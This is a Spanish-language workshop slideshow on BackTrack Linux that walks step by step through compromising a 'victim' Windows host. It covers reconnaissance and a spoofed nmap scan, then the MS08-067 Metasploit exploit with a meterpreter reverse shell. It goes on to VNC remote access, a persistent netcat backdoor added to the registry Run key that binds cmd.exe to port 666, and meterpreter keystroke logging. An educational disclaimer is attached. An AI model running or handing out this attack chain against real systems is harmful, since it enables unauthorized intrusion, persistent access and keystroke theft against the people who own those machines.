Taller Backtrack

12
Taller Backtrack Linux [*] Presentacion [*] Disclaimer [*] Que es Backtrack? [*] Tools [*] Habilitacion de Servicios [*] Taller Footprinting Scanning Exploiting vulnerabilities Habilitar Escritorio remoto BackDoor Keylogger [*] Links de Interes

description

:)

Transcript of Taller Backtrack

Page 1: Taller Backtrack

Taller Backtrack Linux

[*] Presentacion

[*] Disclaimer

[*] Que es Backtrack?

[*] Tools

[*] Habilitacion de Servicios

[*] Taller

– Footprinting

– Scanning

– Exploiting vulnerabilities

– Habilitar Escritorio remoto

– BackDoor

– Keylogger

[*] Links de Interes

Page 2: Taller Backtrack

[*] DisclaimerTaller de backtrack se hace solo con fines exclusivamente educativos, para motivar el movimiento del software libre, Tambien mostrar que tan vulnerables son los S.O y sus servicios. Los desarrolladores de este taller no se hacen responsables del futuro uso de conocimientos y habilidades adquiridas en el taller.

[*] Que es BacktrackEs una distribucion Gnu/Linux basada en ubuntu (la version 4), las versiones 1 2 3 estan basadas en slax, esta distro esta Enfocada hacia el area de seguridad informatica y pentest. Esta gran plataforma fue desarrollada por los muchach@s de remote-exploit.

[*] ToolsInformatio Gathering

Networking mapping

Vulnerability Identification

Web application Analysis

Radio network analysis

penetration

Privilege Escalation

Page 3: Taller Backtrack

Maintaining Access

Digital Forensics

Reverse Engieneering

Voive Over IP

Misecellaneous

[*] Habilitacion de serviciosHabilitando Tarjetas de red

• ifup eth0• ifconfig eth0 – dhclient eth0• ifconfig wlan0 – wicd – GUI wicd manager

Habilitando servidor apache

• /etc/init.d/apache2 start | stop

Habilitando Servidor SSH

• /etc/init.d/ssh start | stop• sshd generate

[*] Taller

Host A ------> VictimaHost B ------> Atacante

-FootprintingEste paso es donde llevaremos acabo el reconocimiento del host A.

Page 4: Taller Backtrack

1# Netcat

Colocaremos el netcat a la escucha de nuestro puerto 80 y con un poco de ingienieria social haremos que el host A se conecte al host B por medio cualquier Navegador.

HOST Broot@bt:# nc -vlp 80

HOST A

HOST B

Page 5: Taller Backtrack

2# Lanmap

Lanmap como el mismo nombre lo dice LAN – MAP lo que hace es graficar la red LAN donde estamos ubicados, de acuerdo a solucitudes que hace los dispositivos tanto intermedios (routers, switchs, etc) como finales (computadores, impresoras, telefonos IP, etc) daran una respuesta y al dar su respuesta el lanmap la recibira y graficara la LAN. De alli tambien podremos verificar que tipo de S.O tienen los demas hosts en la LAN.

HOST B

root@bt:# lanmap -v -i wlan | eth0 -r 30 -T png -o /root/

en la sintaxis definimos la interface por donde estamos conectados damos un tiempo de respuesta, el formato de salida de la imagen .PNG y el directorio donde sera guardado.

Page 6: Taller Backtrack

Aquí podremos ver el host A :), con esto nos podremos ubicar como esta estructurada la LAN donde estamos, despues que veamos que la imagen esta practicamente totalmente hecha prodemos ver nuestra shell donde ejecutamos el lanmap y alli podremos ver mas caracateristicas (ttl de cada host, direccion MAC , etc).

-ScanningEste paso es donde veremos que puertos tiene habilitados y con que servicio se esta ejecutando, tambiem podremos partir de a las respuesta que nos de nuestro host A para ver que S.O esta corriendo en el.

1#nmap

nmap es una herramienta que nos permite escanear puertos, hacer detencion del sistema operativo, entre otras muchas utilidades.lo que haremos ahorita sera hacer un escaneo activo para verificar que puertos tiene habilitados, que servicio se esta ejecutando, hacer dentecion del sistema operativo y hacer ip spoofing.

nmap -e eth0 -PN -S <Host_ipspoof> -sV -O <hostA>

en la sintaxix definimos la interface de red que sera eth0 / wlan0 luego activamos la funcion de ping y luego la funcion de spoofing (osea que cuando van a ver la trama de datos y van a ver en el encabezado la ip de provenencia va a aparecer la ip que nostros definamos alli) activamos estas 3 funciones para que cuando cuando se active el escaneo funcione completamente, luego definimos un escaneo de puertos y servicios, por ultimo la detencion del sistema operativo y definimos el host.

Page 7: Taller Backtrack

Como vemos nos funciono perfectamente, nos muestra que puertos estan habilitados y que S.O esta ejecutandose, para probar que la funcion de spoof esta bien analizaremos la red con el wireshark.

Como vemos aparece en la trama de red cuando lanzamos el escaneo la ip que definimos 25.25.25.25

-Exploiting vulnerabilities

Este metodo que llevaremos acabo lo haremos partiendo de la informacion que hemos obtenido hasta ahora. Bueno como vemos en los puertos habilitados tenemos 2 que son sumamente vulnerables.

Aquí utilizaremos un herramienta llamada metasploit (metasploit es una plataforma donde encotraremos exploits, encoder, auxiliarys y demas herramientas que vienen con si), el termino exploit es un programa que explota las vulnerabilidades de X sistema dentro de dicho exploit se encuentra la shellcode

Page 8: Taller Backtrack

(la shellcode son lineas de ASM que permite activar shells remotas del sistema y mas propiedades)

Introduccion a metasploit

Tipo de interfaces

Shell

GUI

Page 9: Taller Backtrack

WEB

Comandos y terminos basicos

payload ----> Tipo de accion la cual se va a realizar si es explotada la vulnerabilidada

exploits ----> Programa para explotar la vulnerabilidad

encoders ----> Algoritmos de ayuda

auxiliary ---> Modulos o tools de msf

set -----> Definir valor

use -----> Definir exploit

run -----> modo de ejecutar los auxiliarys

exploit ---> modo de ejecutar los

sessions ---> mostrar / iniciar sessiones obtenidas con el metasploit

Page 10: Taller Backtrack

-Explotanto Vulnerabilidad port 445

selecionando Exploit ----> use windows/smb/ms08_067_netapiselecionando payload ----> set payload windows/meterpreter/reverse_tcpselecionando Host Victima –> set RHOST <IP_Victima>selecionando Host Atacante -> set LHOST <IP_Atacker>Ejecutando el Exploit -> exploit

Resultado

Como hemos visto hemos logrado acceder al sistema windows, obtenemos una session de meterpreter (el interprete de windows) y luego ejecutamos un codigo del sistema.

- Habilitar Escritorio remoto

sintaxisrun vnc

lo que se hace aquí es enviarle un es enviarle un server con la propiedad de Escritorio remoto y lo que se hara entablar la conexión y empezar a funcinar como tal el escritorio remoto.

Page 11: Taller Backtrack

-BackDoorQue es un BackDoor?

*netcatInstalacion de un backdoor

1 subimos de nuestro Host al Host Victima el netcatupload /root/nc.exe C:\\Windows\\System32\\

2 agregamos al registro el nectat en modo escucha

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Lab Backtrack -d 'C:\Windows\System32\nc.exe -L -d -p 666 -e cmd.exe'

3 Reiniciamos el host

reboot

4 metodos de conexión

[*]msf[*]netcat

Conclucionasi cada vez que necesitimos volver a conectarnos al host no tenemos que volver a explotar la vulnerabilidad, solo es cuestion de conectarse.

Page 12: Taller Backtrack

-KeyloggerQue es un Keylogger

Ejecucion

keyscan_start

keyscan_dump

keyscan_stop

– Links de interes[*] http://www.backtrack-linux.org/[*] http://taxoback.eshost.com.ar/[*] http://www.assasins.com.ar/[*] http://comunidad.dragonjar.org/[*] http://www.antrax-labs.tk/

Taller eleborado por:Kevin David Quiroga Astroz - [Progresive Death]Aprendiz senaLider - Comunidad de Desarrollo Informatico [CDIN]

Contacto:[email protected]